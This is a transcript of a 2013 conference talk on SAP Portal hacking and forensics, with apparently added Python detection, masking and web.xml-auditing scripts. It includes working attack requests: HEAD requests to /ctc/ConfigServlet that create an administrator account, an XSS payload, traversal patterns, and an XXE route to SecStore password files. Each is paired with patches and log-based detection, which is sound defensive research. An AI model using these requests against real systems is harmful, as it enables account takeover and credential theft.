SAP Portal Hacking and Forensics at Confidence 2013


Transcript of SAP Portal Hacking and Forensics at Confidence 2013

  • 8/9/2019 SAP Portal Hacking and Forensics at Confidence 2013

    1/88

    Invest in security to secure investments

    SAP Portal: Hacking and forensics

    Dmitry Chastukhin, Director of SAP pentest/research team
    Evgeny Neyolov, Security analyst, (anti)forensics research

  • Slide 2: ERPScan

    Leading SAP AG partner in the field of discovering security vulnerabilities, by the number of found vulnerabilities
    Developing software for SAP security monitoring
    Talks at 35+ security conferences worldwide: BlackHat (US/EU/DC/UAE), RSA, Defcon, CONFidence, HITB, etc.
    First to develop software for NetWeaver J2EE assessment
    The only solution to assess all areas of SAP security
    Research team with experience in different areas of security, from ERP and web security to mobile, embedded devices, and critical infrastructure, accumulating their knowledge on SAP research.

  • Slide 3: Dmitry Chastukhin

    Business application security expert
    Yet another security researcher

  • Slide 4: Agenda

    SAP security
    SAP forensics: WTF?!
    Say hello to SAP Portal
    Breaking SAP Portal
    Catch me if you can
    Conclusion

  • Slide 5: SAP

    The most popular business application
    More than 180000 customers worldwide
    More than 70% of Forbes 500 run SAP
    More than 40% of ERP market in Poland

  • Slide 6: SAP security

    Espionage
      Stealing financial information
      Stealing corporate secrets
      Stealing supplier and customer lists
      Stealing HR data
    Fraud
      False transactions
      Modification of master data
    Sabotage
      Denial of service
      Modification of financial reports
      Access to technology network (SCADA) by trust relations

  • Slide 7: SAP security

    [Chart: number of SAP security talks per year, 2003 to 2013, by conference: BlackHat, Defcon, HITB, RSA, CONFidence, DeepSec, Hacktivity, Troopers; y-axis ticks 0 to 35]
    Source: SAP Security in Figures 2013
    http://erpscan.com/wp-content/uploads/2012/06/SAP-Security-in-figures-a-global-survey-2007-2011-final.pdf
  • Slide 8: How easy? SAP Security Notes

    More than 2600 in total

  • Slide 9: Is it remotely exploitable?

    > 5000 non-web SAP services exposed in the world, including Dispatcher, Message server, SapHostControl, etc.
    sapscan.com

  • Slide 10: What about other services?

    [Chart: exposed services worldwide, y-axis ticks 0 to 9, for SAP Dispatcher, SAP MMC, SAP Message Server, SAP HostControl, SAP ITS Agate, SAP Message Server httpd]

  • Slide 11: What about unpublished threats?

    Companies are not interested in publishing information about their breaches
    There are a lot of internal breaches thanks to unnecessarily given authorizations (an employee by mistake buys hundreds of excavators instead of ten)
    There are known stories about backdoors left by developers in custom ABAP code
    How can you be sure that, if a breach occurs, you can find evidence?

  • Slide 12: SAP Forensics

    If there are no attacks, it doesn't mean anything
    Companies don't like to share it
    Companies don't use security audit: ~10%
    Even if used, nobody manages it: ~5%
    Even if managed, no correlation: ~1%

  • Slide 13: Typical SAP audit options

    ICM log (icm/HTTP/logging_0)          70%
    Security audit log in ABAP            10%
    Table access logging (rec/client)      4%
    Message Server log (ms/audit)          2%
    SAP Gateway access log                 2%

    * The percentage of companies is based on our security assessments and product implementations.

  • Slide 14: What do we see?

    A lot of research
    Real attacks
    Lack of logging practice
    Many vulnerabilities are hard to close
    We need to monitor them, at least

  • Slide 15: What do we need to monitor?

    External attacks on SAP
    Attack users and SAP GUI
    SAP Portal and WEB
    Exposed SAP services
    SAProuter

    * Ideally, we should control everything, but this talk has limits, so let's focus on the most critical areas.

    Awareness
    Secure configuration and patch management
    Disable them
    Too many issues and custom configuration
    Can be 0-days
    Need to concentrate on this area

  • Slide 16: Say hello to Portal

    Point of web access to SAP systems
    Point of web access to other corporate systems
    Way for attackers to get access to SAP from the Internet

  • Slide 17: EP architecture

    (diagram only)

  • Slide 18

    Okay, okay. SAP Portal is important, and it has many links to other modules. So what?

  • Slide 19: SAP Logging

    If you are running an ABAP + Java installation of Web AS with SAP Web Dispatcher as a load balancing solution, you can safely disable logging of HTTP requests and responses on J2EE Engine, and use the corresponding CLF logs of SAP Web Dispatcher. This also improves the HTTP communication performance. The only* drawback of using the Web Dispatcher's CLF logs is that no information is available about the user executing the request (since the user is not authenticated on the Web Dispatcher, but on the J2EE Engine instead).
    SOURCE: SAP HELP, http://help.sap.com/saphelp_nw70ehp1/helpdata/en/ef/8cd7f51dfead42ab90537886104269/frameset.htm

    * Not the only drawback: there are many complex attacks that use POST requests.
  • Slide 20: SAP J2EE Logging

    Categories of system events recording:
      System: all system related security and administrative logs
      Applications: all system events related to business logic
      Performance: reserved for single activity tracing
    Default location of these files in your file system: \usr\sap\\\j2ee\cluster\\log\

  • Slide 21: SAP J2EE Logging

    The developer trace files of the Java instance: \\work
    The developer trace files of the central services: \\work\\log
    Java server logs: \\j2ee\cluster\server\log

  • Slide 22: Full logging is not always the best option

  • Slide 23: SAP Management Console

  • Slide 24: SAP Management Console

    SAP MMC: centralized system management
    SAP MMC has remote commands
    Commands are simple SOAP requests
    Allowing to see the trace and log messages
    It's not bad if you only use it sometimes and delete logs after use, but...

  • Slide 25: SAP Management Console

    What can we find in logs?
    Right! The file userinterface.log contains the calculated JSESSIONID
    But... the attacker must have credentials to read the log file
    WRONG!

  • Slide 26: SAP Management Console

    [SAP MMC SOAP request that reads a log file; XML tags lost in extraction. Remaining values: true, j2ee/cluster/server0/log/system/userinterface.log, %COUNT%, EOF]

  • Slide 27: Prevention

    Don't use TRACE_LEVEL = 3
    Delete traces when work is finished
    Limit access to dangerous methods
    Install notes 927637 and 1439348
    Mask security-sensitive data in HTTP access log
    SAP Help: http://help.sap.com/saphelp_nwpi71/helpdata/en/d6/49543b1e49bc1fe10000000a114084/frameset.htm
  • Slide 28: Prevention

    The HTTP Provider service can mask security-sensitive URL parameters, cookies, or headers
    By default, only for the items listed below:
      Path Parameter: jsessionid
      Request Parameters: j_password, j_username, j_sap_password, j_sap_again, oldPassword, confirmNewPassword, ticket
      HTTP Headers: Authorization, Cookie (JSESSIONID, MYSAPSSO2)
    SAP Help: http://help.sap.com/saphelp_nwce71/helpdata/en/79/77b142c444c96ae10000000a155106/content.htm
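As an added example (not from the slides or from SAP), the following Python filter applies that default masking list to log lines before they are copied to a second log store. The `mask_line` name, the line layout and the sample lines are assumptions, and `EXTRA_PARAMS` is a site-specific addition that the defaults do not include.

```python
"""Mask the HTTP Provider's default list of security-sensitive items in access
and trace log lines before the lines are copied off the server.

The names below are the defaults quoted on the slide. Anything else that carries
a secret (for example the PASSWORD field inside a ctc ConfigServlet URL shown
later in the deck) is not covered by the defaults and has to be added by hand;
EXTRA_PARAMS is that site-specific addition, an assumption of this example.
"""
import re

PATH_PARAMS = ("jsessionid",)
REQUEST_PARAMS = ("j_password", "j_username", "j_sap_password", "j_sap_again",
                  "oldPassword", "confirmNewPassword", "ticket")
COOKIES = ("JSESSIONID", "MYSAPSSO2")
HEADERS = ("Authorization",)
EXTRA_PARAMS = ("PASSWORD",)     # not an SAP default: added for the ctc URLs
MASK = "***"


def _mask_params(text, names):
    # key=value pairs introduced by ?, &, ; or , (ctc URLs separate fields with ; and ,)
    pat = re.compile(r"(?<=[?&;,])(" + "|".join(map(re.escape, names)) + r")=[^&;,\s]*", re.I)
    return pat.sub(lambda m: m.group(1) + "=" + MASK, text)


def _mask_path_params(text, names):
    # path parameters look like /irj/portal;jsessionid=...?query
    pat = re.compile(r";(" + "|".join(map(re.escape, names)) + r")=[^?;/\s]*", re.I)
    return pat.sub(lambda m: ";" + m.group(1) + "=" + MASK, text)


def _mask_cookies(value):
    pat = re.compile(r"\b(" + "|".join(map(re.escape, COOKIES)) + r")=[^;\s]*")
    return pat.sub(lambda m: m.group(1) + "=" + MASK, value)


def mask_line(line):
    """Apply every default mask to one log line (request line or header line)."""
    for name in HEADERS:                      # the whole header value is replaced
        line = re.sub(r"(?im)^(\s*" + re.escape(name) + r":\s*).*$", r"\1" + MASK, line)
    line = re.sub(r"(?im)^(\s*Cookie:\s*)(.*)$",
                  lambda m: m.group(1) + _mask_cookies(m.group(2)), line)
    line = _mask_path_params(line, PATH_PARAMS)
    line = _mask_params(line, REQUEST_PARAMS + EXTRA_PARAMS)
    return line


# Constructed sample lines in the shape of an HTTP trace; the Basic credential is
# the RFC example "Aladdin:open sesame", the other values are made up.
SAMPLE_LINES = [
    "GET /irj/portal;jsessionid=ABC123XYZ!123456?j_user=jdoe&j_password=Secr3t HTTP/1.1",
    "HEAD /ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;CREATEUSER;USERNAME=CONF,PASSWORD=idence HTTP/1.0",
    "Authorization: Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==",
    "Cookie: JSESSIONID=9F1A2B3C; saplb_*=(J2EE1234)1234; MYSAPSSO2=AjExMDAgAAtw",
]


def mask_all(lines):
    return [mask_line(l) for l in lines]


if __name__ == "__main__":
    for before, after in zip(SAMPLE_LINES, mask_all(SAMPLE_LINES)):
        print(before, "\n ->", after)
```

Note that `j_user` in the first sample line stays visible: only the exact names in the list are masked, which is why the list has to be reviewed against the parameters your own applications use.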
  • Slide 29: SAP NetWeaver J2EE

  • Slide 30: Access Control

    Web Dynpro: programmatic (by UME)
    Portal iViews: programmatic (by UME)
    J2EE Web apps: declarative (by WEB.XML)


  • Slide 32: web.xml

    [web.xml excerpt; XML tags lost in extraction. Remaining values: CriticalAction, com.sap.admin.Critical.Action, CriticalAction]

  • Slide 33: Verb Tampering

    If we are trying to get access to an application using GET, we need a login:pass and administrator role
    What if we try to get access to the application using HEAD instead of GET?
    PROFIT!
    Did you know about ctc?

  • Slide 34: Verb Tampering

    Need an Admin account in SAP Portal? Just send two HEAD requests
    Create new user CONF:idence
      HEAD /ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;CREATEUSER;USERNAME=CONF,PASSWORD=idence
    Add the user CONF to the group Administrators
      HEAD /ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;ADD_USER_TO_GROUP;USERNAME=CONF,GROUPNAME=Administrators

    * Works when UME uses the JAVA database.

  • Slide 35: Prevention

    Install SAP notes 1503579, 1616259, 1589525, 1624450
    Install other SAP notes about Verb Tampering
    Scan applications with ERPScan WEB.XML checker
    Disable the applications that are not necessary
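The web.xml check behind that recommendation, written here as an added Python example rather than ERPScan's checker: a `<security-constraint>` that enumerates `<http-method>` elements leaves every other verb unprotected, which is the verb-tampering condition the previous slides exploit. The sample web.xml is constructed around the CriticalAction servlet named on slide 32, and `check_web_xml` is my name.

```python
"""Flag web.xml security constraints that can be bypassed by HTTP verb tampering.

A <security-constraint> protects only the HTTP methods it enumerates in
<http-method>; a request with any other verb (HEAD, or an arbitrary string)
reaches the servlet without the role check. A constraint with no
<http-method> element covers every verb.
"""
import xml.etree.ElementTree as ET

# Constructed sample, modelled on the CriticalAction servlet named on the slides.
SAMPLE_WEB_XML = """<web-app xmlns="http://java.sun.com/xml/ns/j2ee">
  <servlet>
    <servlet-name>CriticalAction</servlet-name>
    <servlet-class>com.sap.admin.Critical.Action</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>CriticalAction</servlet-name>
    <url-pattern>/admin/critical</url-pattern>
  </servlet-mapping>
  <security-constraint>
    <web-resource-collection>
      <web-resource-name>CriticalAction</web-resource-name>
      <url-pattern>/admin/critical</url-pattern>
      <http-method>GET</http-method>
      <http-method>POST</http-method>
    </web-resource-collection>
    <auth-constraint><role-name>administrators</role-name></auth-constraint>
  </security-constraint>
  <security-constraint>
    <web-resource-collection>
      <web-resource-name>Reports</web-resource-name>
      <url-pattern>/reports/*</url-pattern>
    </web-resource-collection>
    <auth-constraint><role-name>administrators</role-name></auth-constraint>
  </security-constraint>
  <security-constraint>
    <web-resource-collection>
      <web-resource-name>Open</web-resource-name>
      <url-pattern>/open/*</url-pattern>
    </web-resource-collection>
  </security-constraint>
</web-app>
"""


def _local(tag):
    """Strip the XML namespace so tags can be compared by local name."""
    return tag.rsplit("}", 1)[-1]


def _children(elem, name):
    return [c for c in elem if _local(c.tag) == name]


def _texts(elem, name):
    return [(c.text or "").strip() for c in _children(elem, name)]


def check_web_xml(xml_text):
    """Return one finding dict per weak constraint in the given web.xml text."""
    root = ET.fromstring(xml_text)
    findings = []
    for sc in root.iter():
        if _local(sc.tag) != "security-constraint":
            continue
        has_auth = bool(_children(sc, "auth-constraint"))
        for wrc in _children(sc, "web-resource-collection"):
            name = (_texts(wrc, "web-resource-name") or ["?"])[0]
            patterns = _texts(wrc, "url-pattern")
            methods = [m.upper() for m in _texts(wrc, "http-method")]
            if not has_auth:
                # No <auth-constraint>: the resource is reachable by anyone, with any verb.
                findings.append({"resource": name, "patterns": patterns,
                                 "issue": "NO_AUTH_CONSTRAINT", "methods": methods})
            elif methods:
                # Only the listed verbs get the role check; every other verb bypasses it.
                findings.append({"resource": name, "patterns": patterns,
                                 "issue": "VERB_TAMPERING", "methods": methods})
    return findings


if __name__ == "__main__":
    for f in check_web_xml(SAMPLE_WEB_XML):
        hint = "" if f["issue"] == "NO_AUTH_CONSTRAINT" else \
            " (remove the <http-method> elements so the constraint covers all verbs)"
        print(f"{f['issue']:20} {f['resource']:15} {','.join(f['patterns'])}{hint}")
```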

  • Slide 36: Investigation

    j2ee\cluster\\log\system\httpaccess\responses.trc:
    [Apr 3, 2013 1:23:59 AM ] - 192.168.192.14 : GET /ctc/ConfigServlet HTTP/1.1 401 1790
    [Apr 3, 2013 1:30:01 AM ] - 192.168.192.14 : HEAD /ctc/ConfigServlet HTTP/1.1 200 0
    [Apr 3, 2013 1:30:01 AM ] - 192.168.192.14 : HEAD /ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;CREATEUSER;USERNAME=CONF,PASSWORD=idence HTTP/1.0 200 0

  • Slide 37: web.xml

    [Same web.xml excerpt as on slide 32; XML tags lost in extraction. Remaining values: CriticalAction, com.sap.admin.Critical.Action, CriticalAction]

  • Slide 38: Invoker Servlet

    Want to execute an OS command on the J2EE server remotely? Maybe upload a backdoor in a Java class? Or sniff all traffic?
    Still remember ctc?

  • Slide 39: Invoker Servlet

  • Slide 40: Prevention

    Update to the latest patch: 1467771, 1445998
    EnableInvokerServletGlobally must be false
    Check all WEB.XML files with ERPScan WEBXML checker

  • Slide 41: Investigation

    #1.5#000C29C2603300790000003A000008700004D974E7CCC6D8#1364996035203#/System/Security/Audit#sap.com/tc~lm~ctc~util~basic_ear#com.sap.security.core.util.SecurityAudit#Guest#0#SAP J2EE Engine JTA Transaction : [024423a006e18]#n/a##217c5d309c6311e29bca000c29c26033#SAPEngine_Application_Thread[impl:3]_22##0#0#Info#1#com.sap.security.core.util.SecurityAudit#Plain###Guest | USER.CREATE | USER.PRIVATE_DATASOURCE.un:CONF | | SET_ATTRIBUTE:uniquename=[CONF]#

    #1.5#000C29C2603300680002C97A000008700004D974E8354D1D#1364996042062#/System/Security/Audit/J2EE#sap.com/irj#com.sap.engine.services.security.roles.audit#Guest#182818##n/a##0c5b fef08bc511e287e6000c29c26033#Thread[Thread-50,5,SAPEngine_Application_Thread[impl:3]_Group]##0#0#Info#1#com.sap.engine.services.security.roles.audit#Java###{0}: Authorization check for caller assignment to J2EE security role [{1} : {2}].#3#ACCESS.OK#SAP-J2EE-Engine#guests#
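As an added example (not from the slides), a Python scan that turns the evidence on slides 36 and 41 into detection rules: odd verbs and UME commands against /ctc/ConfigServlet in responses.trc, a verb switch after a 401, and USER./GROUP. actions audited under the Guest principal. The sample lines are the ones shown on those slides plus one constructed benign line; the function names and the field positions assumed for the #-separated audit record are mine.

```python
"""Detection rules for the verb-tampering evidence on slides 36 and 41.

responses.trc (httpaccess) rules:
  VERB_TAMPERING         a verb other than GET/POST against /ctc/ConfigServlet
  UME_COMMAND_IN_URL     CREATEUSER / ADD_USER_TO_GROUP carried in the query string
  VERB_SWITCH_AFTER_401  a 2xx for a path the same client was refused (401) with another verb
/System/Security/Audit rule:
  GUEST_UME_CHANGE       a USER.* (or, by analogy, GROUP.*) action whose principal is Guest
"""
import re

ACCESS_RE = re.compile(
    r"^\[(?P<ts>[^\]]+)\]\s*-\s*(?P<ip>[\d.]+)\s*:\s*(?P<method>[A-Z]+)\s*"
    r"(?P<url>\S+)\s+HTTP/[\d.]+\s+(?P<status>\d{3})\s+(?P<size>\d+)\s*$")
# message part of an audit record: "###<actor> | <ACTION.NAME> | ..."
AUDIT_MSG_RE = re.compile(r"###(?P<actor>[^|#]+?)\s*\|\s*(?P<action>[A-Z_]+\.[A-Z_]+)\s*\|")

CTC_PATH = "/ctc/ConfigServlet"
UME_COMMANDS = ("CREATEUSER", "ADD_USER_TO_GROUP")

# Slide 36 lines plus one constructed benign request.
ACCESS_LINES = [
    "[Apr 3, 2013 1:23:59 AM ] - 192.168.192.14 : GET /ctc/ConfigServlet HTTP/1.1 401 1790",
    "[Apr 3, 2013 1:30:01 AM ] - 192.168.192.14 : HEAD /ctc/ConfigServlet HTTP/1.1 200 0",
    "[Apr 3, 2013 1:30:01 AM ] - 192.168.192.14 : HEAD /ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;CREATEUSER;USERNAME=CONF,PASSWORD=idence HTTP/1.0 200 0",
    "[Apr 3, 2013 1:31:10 AM ] - 192.168.192.30 : GET /irj/portal HTTP/1.1 200 4120",
]
# Slide 41 records: the user creation by Guest, then the role check that let it through.
AUDIT_LINES = [
    "#1.5#000C29C2603300790000003A000008700004D974E7CCC6D8#1364996035203#/System/Security/Audit#sap.com/tc~lm~ctc~util~basic_ear#com.sap.security.core.util.SecurityAudit#Guest#0#SAP J2EE Engine JTA Transaction : [024423a006e18]#n/a##217c5d309c6311e29bca000c29c26033#SAPEngine_Application_Thread[impl:3]_22##0#0#Info#1#com.sap.security.core.util.SecurityAudit#Plain###Guest | USER.CREATE | USER.PRIVATE_DATASOURCE.un:CONF | | SET_ATTRIBUTE:uniquename=[CONF]#",
    "#1.5#000C29C2603300680002C97A000008700004D974E8354D1D#1364996042062#/System/Security/Audit/J2EE#sap.com/irj#com.sap.engine.services.security.roles.audit#Guest#182818##n/a##0c5bfef08bc511e287e6000c29c26033#Thread[Thread-50,5,SAPEngine_Application_Thread[impl:3]_Group]##0#0#Info#1#com.sap.engine.services.security.roles.audit#Java###{0}: Authorization check for caller assignment to J2EE security role [{1} : {2}].#3#ACCESS.OK#SAP-J2EE-Engine#guests#",
]


def scan_access(lines):
    alerts = []
    refused = {}   # (ip, path) -> verbs already answered with 401
    for line in lines:
        m = ACCESS_RE.match(line)
        if not m:
            continue
        ip, method, status = m.group("ip"), m.group("method"), int(m.group("status"))
        path, _, query = m.group("url").partition("?")
        key = (ip, path)
        if status == 401:
            refused.setdefault(key, set()).add(method)
            continue
        if path.startswith(CTC_PATH) and method not in ("GET", "POST"):
            alerts.append({"kind": "VERB_TAMPERING", "ip": ip, "line": line})
        if any(cmd in query.upper() for cmd in UME_COMMANDS):
            alerts.append({"kind": "UME_COMMAND_IN_URL", "ip": ip, "line": line})
        if 200 <= status < 300 and key in refused and method not in refused[key]:
            alerts.append({"kind": "VERB_SWITCH_AFTER_401", "ip": ip, "line": line})
    return alerts


def scan_audit(lines):
    alerts = []
    for line in lines:
        fields = line.split("#")        # assumed layout: [5] application, [7] principal
        if len(fields) < 8 or fields[1] != "1.5":
            continue
        app, user = fields[5], fields[7]
        m = AUDIT_MSG_RE.search(line)
        if not m:
            continue
        action = m.group("action")
        if user == "Guest" and action.split(".", 1)[0] in ("USER", "GROUP"):
            alerts.append({"kind": "GUEST_UME_CHANGE", "actor": user, "action": action,
                           "app": app, "line": line})
    return alerts


if __name__ == "__main__":
    for a in scan_access(ACCESS_LINES) + scan_audit(AUDIT_LINES):
        print(a["kind"], a.get("ip") or a.get("actor"), a["line"][:90])
```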

  • Slide 42: Investigation

  • Slide 43: XSS

    Many XSSs in Portal
    But sometimes HttpOnly
    But when we exploit XSS, we can use the features of SAP Portal
    EPCF

  • Slide 44: EPCF

    EPCF provides a JavaScript API designed for the client-side communication between portal components and the portal core framework
    Enterprise Portal Client Manager (EPCM)
    iViews can access the EPCM object from every portal page or IFrame
    Every iView contains the EPCM object
    For example, EPCF is used as a transient user data buffer for iViews:
      alert(EPCM.loadClientData("urn:com.sap.myObjects", "person"));

  • Slide 45: Prevention

    Install SAP note 1656549

  • Slide 46: Investigation

    j2ee\cluster\\log\system\httpaccess\responses.trc:
    #Plain###192.168.192.26 : GET /irj/servlet/prt/portal/prtroot/com.sap.portal.usermanagement.admin.UserMapping?systemid=MS_EXCHANGEaaaa%3C/script%3E%3Cscript%3Ealert(%27xSS%27)%3C/script%3E HTTP/1.1 200 3968#

  • Slide 47: Web Dynpro JAVA

    Web Dynpro unauthorized modifications. For example:
      somebody steals an account using XSS/CSRF/Sniffing
      then tries to modify the severity level of logs

  • Slide 48: Web Dynpro JAVA

    SAP Help: http://help.sap.com/saphelp_nw70/helpdata/en/42/fa080514793ee6e10000000a1553f7/frameset.htm
  • Slide 49: Investigation

    No traces of the change in the default log files (\cluster\server0\log\system\httpaccess\responses.log)
    Web Dynpro sends all data by POST, and we only see GET URLs in responses.log
    But sometimes we can find information by indirect signs:
    [Mar 20, 2013 9:35:49 AM ] - 172.16.0.63 : GET /webdynpro/resources/sap.com/tc~lm~webadmin~log_config~wd/Components/com.sap.tc.log_configurator.LogConfigurator/warning.gif HTTP/1.1 200 110
    The client loaded images from the server during some changes

  • Slide 50: Investigation

    Most actions have icons
    They have to be loaded from the server
    Usually, legitimate users have them all in cache
    Attackers usually don't have them, so they make requests to the server
    That's how we can identify potentially malicious actions
    But there should be correlation with a real user's activity
    False positives are possible:
      New legitimate user
      Old user clears cache
      Other

  • Slide 51: Directory traversal

    FIX

  • Slide 52: Directory traversal fix bypass

  • Slide 53: Prevention

    Install SAP note 1630293

  • Slide 54: Investigation

    Patterns to search for in the logs:
      /../
      !252f..!252f
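Added Python example (not from the slides) for searching those patterns: the Portal writes `!xx` where a URL would have `%xx` (as in `pcd!3aportal_content!2f...` on later slides), so `!252f..!252f` only becomes `/../` after two decoding rounds. `decode_portal_path` and `inspect_path` are my names and the sample paths are constructed.

```python
"""Normalise Portal request paths before searching them for directory traversal.

The Portal writes PCD paths with '!xx' in place of '%xx' (pcd!3aportal_content!2f...
on the slides), so a traversal can be hidden as !252f..!252f: one decoding round
yields %2f..%2f, a second yields /../. This example decodes until the string stops
changing and then inspects the path segments, so a grep for the literal '/../'
is replaced by a check that also catches the encoded forms.
"""
import re
from urllib.parse import unquote

BANG_ESCAPE = re.compile(r"!([0-9A-Fa-f]{2})")


def decode_portal_path(raw, max_rounds=5):
    """Return (decoded_path, rounds); rounds is the number of encoding layers removed."""
    cur = raw
    for rounds in range(max_rounds):
        nxt = BANG_ESCAPE.sub(lambda m: "%" + m.group(1), cur)   # '!2f' -> '%2f'
        nxt = unquote(nxt)                                       # '%2f' -> '/'
        if nxt == cur:
            return cur, rounds
        cur = nxt
    return cur, max_rounds


def inspect_path(raw):
    decoded, rounds = decode_portal_path(raw)
    # Assumption: treat backslashes like forward slashes so '..\' variants are seen too.
    segments = decoded.replace("\\", "/").split("/")
    traversal = ".." in segments
    return {
        "raw": raw,
        "decoded": decoded,
        "encoding_depth": rounds,
        "traversal": traversal,
        # more than one layer of encoding is itself a filter-evasion signal,
        # even when the decoded path turns out to be harmless
        "suspicious": traversal or rounds > 1,
    }


# Constructed sample paths: clean, plain traversal, double-encoded traversal,
# and a legitimate PCD path using the Portal's '!' escape.
SAMPLES = [
    "/irj/go/km/docs/public/report.pdf",
    "/irj/go/km/docs/public/../private/report.pdf",
    "/irj/go/km/docs/public!252f..!252fprivate/report.pdf",
    "pcd!3aportal_content!2fadministrator!2fsuper_admin",
]


def inspect_all(paths):
    return [inspect_path(p) for p in paths]


if __name__ == "__main__":
    for r in inspect_all(SAMPLES):
        flag = "SUSPICIOUS" if r["suspicious"] else "ok"
        print(f"{flag:10} depth={r['encoding_depth']} traversal={r['traversal']} {r['decoded']}")
```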

  • Slide 55: Breaking SAP Portal

    Found a file in the OS of SAP Portal with the encrypted passwords for administration and DB
    Found a file in the OS of SAP Portal with keys to decrypt passwords
    Found a vulnerability (another one ;)) which allows reading the files with passwords and keys
    Decrypt passwords and log into Portal
    PROFIT!


  • Slide 58: XXE in Portal

  • Slide 59: XXE in Portal

  • Slide 60: XXE

    Error based XXE

  • Slide 61: XXE in Portal: Result

    We can read any file, including config with passwords
    The SAP J2EE Engine stores the database user SAPDB; its password is here: \usr\sap\\SYS\global\security\data\SecStore.properties

  • Slide 62: Where are the passwords? (config.properties)

    rdbms.maximum_connections=5
    system.name=TTT
    secstorefs.keyfile=/oracle/TTT/sapmnt/global/security/data/SecStore.key
    secstorefs.secfile=/oracle/TTT/sapmnt/global/security/data/SecStore.properties
    secstorefs.lib=/oracle/TTTsapmnt/global/security/lib
    rdbms.driverLocation=/oracle/client/10x_64/instantclient/ojdbc14.jar
    rdbms.connection=jdbc/pool/TTT
    rdbms.initial_connections=1

  • Slide 63: Where are the passwords? (config.properties)

    (Same config.properties listing as on slide 62.)

  • Slide 64: SecStore.properties

    $internal/version=Ni4zFF4wMSeaseforCCMxegAfx
    admin/host/TTT=7KJuOPPs/+u+14jM7uy7cy7exrZuYvevkSrPxwueur2445yxgBS
    admin/password/TTT=7KJuOPPs/+uv+14j56vDc7M7v7dytbGbkgqDp+QD04b0Fh
    jdbc/pool/TTT=7KJuOPPs/+u5jM6s1cvvgQ1gzFvarxuUzEJTHTJI0VGegH
    admin/port/TTT=7KJuOPPs/+u+1j4vD1cv6ZTvd336rzEd7267Rwr4ZUgRTQ
    $internal/check=BJRrzfjeUA+bw4XCzdz16zX78ufbt
    $internal/mode=encrypted
    admin/user/TTT=7KJuOPPs/+u+14j6s14sTxXU3ONl3rL6N7yssV75eC6/5S3E

    But where is the key?

  • Slide 65: config.properties

    (Same config.properties listing as on slide 62.)

  • Slide 66: Get the password

    We have an encrypted password
    We have a key to decrypt it
    We got the J2EE admin and JDBC login:password!

  • Slide 67: Prevention

    Install SAP note 1619539
    Restrict read access to the files SecStore.properties and SecStore.key

  • Slide 68: Investigation

    POST /irj/servlet/prt/portal/prteventname/HtmlbEvent/prtroot/pcd!3aportal_content!2fadministrator!2fsuper_admin!2fsuper_admin_role!2fcom.sap.portal.content_administration!2fcom.sap.portal.content_admin_ws!2fcom.sap.km.AdminContent!2fcom.sap.km.AdminContentExplorer!2fcom.sap.km.AdminExplorer/ HTTP/1.1

  • Slide 69: Investigation

    The only way to get HTTP POST request values is to enable HTTP Trace:
      Visual Administrator > Dispatcher > HTTP Provider > Properties: HttpTrace = enable
    For 6.4 and 7.0 SP12 and lower:
      On Dispatcher: /j2ee/cluster/dispatcher/log/defaultTrace.trc
      On Server: \j2ee\cluster\server0\log\system\httpaccess\responses.0.trc
    For 7.0 SP13 and higher:
      /j2ee/cluster/dispatcher/log/services/http/req_resp.trc
    Manually analyze all requests for XXE attacks

  • Slide 70: Malicious file upload: Attack

    Knowledge Management allows uploading to the server different types of files that can store malicious content
    Sometimes, if guest access is allowed, it is possible to upload any file without being an authenticated user
    For example, it can be an HTML file with JavaScript that steals cookies

  • Slide 71: Malicious file upload: Attack

  • Slide 72: Malicious file upload: Attack

  • Slide 73: Malicious file upload: Forensics

    [Apr 10, 2013 2:26:13 AM ] - 192.168.192.22 : POST /irj/servlet/prt/portal/prteventname/HtmlbEvent/prtroot/pcd!3aportal_content!2fspecialist!2fcontentmanager!2fContentManager!2fcom.sap.km.ContentManager!2fcom.sap.km.ContentExplorer!2fcom.sap.km.ContentDocExplorer!2fcom.sap.km.DocsExplorer/documents HTTP/1.1 200 13968
    [Apr 10, 2013 2:26:14 AM ] - 192.168.192.22 : GET /irj/go/km/docs/etc/public/mimes/images/html.gif HTTP/1.1 200 165

    * Again, images can help us.
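Added Python example (not from the slides) that implements the icon heuristic from slides 49, 50 and 73 over responses.log lines: a KM HTML icon fetched right after a POST to the KM DocsExplorer, or any icon of the Log Configurator, is reported for follow-up. The watched prefixes, the time window and the function names are assumptions; the sample lines are the ones on those slides plus one constructed benign line.

```python
"""Find the indirect signs the slides describe: an action whose POST body is not
logged (Web Dynpro) or a KM document upload, betrayed by the icon the client
fetched right afterwards because it was not yet in its cache.
"""
import re
from datetime import datetime, timedelta

ACCESS_RE = re.compile(
    r"^\[(?P<ts>[^\]]+)\]\s*-\s*(?P<ip>[\d.]+)\s*:\s*(?P<method>[A-Z]+)\s*"
    r"(?P<url>\S+)\s+HTTP/[\d.]+\s+(?P<status>\d{3})\s+(?P<size>\d+)\s*$")
TS_FMT = "%b %d, %Y %I:%M:%S %p"

# Resource prefixes whose icons are only fetched while a given admin tool is in use
# (constructed watch list; extend it from icons observed in your own responses.log).
ADMIN_ICON_PREFIXES = {
    "/webdynpro/resources/sap.com/tc~lm~webadmin~log_config~wd/": "Log Configurator",
}
KM_DOCS_POST = "!2fcom.sap.km.DocsExplorer/documents"   # POST target of a KM document action
KM_HTML_ICON = "/irj/go/km/docs/etc/public/mimes/images/html.gif"
WINDOW = timedelta(seconds=5)                            # assumed POST-to-icon gap


def parse(line):
    m = ACCESS_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(" ".join(m.group("ts").split()), TS_FMT)
    return {"ts": ts, "ip": m.group("ip"), "method": m.group("method"),
            "url": m.group("url"), "status": int(m.group("status"))}


def correlate(lines):
    events = sorted((e for e in map(parse, lines) if e), key=lambda e: e["ts"])
    km_posts = {}   # ip -> timestamps of KM document POSTs seen so far
    alerts = []
    for e in events:
        if e["method"] == "POST" and KM_DOCS_POST in e["url"]:
            km_posts.setdefault(e["ip"], []).append(e["ts"])
            continue
        if e["method"] != "GET" or e["status"] != 200:
            continue
        for prefix, tool in ADMIN_ICON_PREFIXES.items():
            if e["url"].startswith(prefix):
                # the POST that changed something is invisible; the icon load is not
                alerts.append({"kind": "ADMIN_TOOL_ICON", "ip": e["ip"], "tool": tool,
                               "ts": e["ts"].isoformat()})
        if e["url"] == KM_HTML_ICON:
            recent = [t for t in km_posts.get(e["ip"], [])
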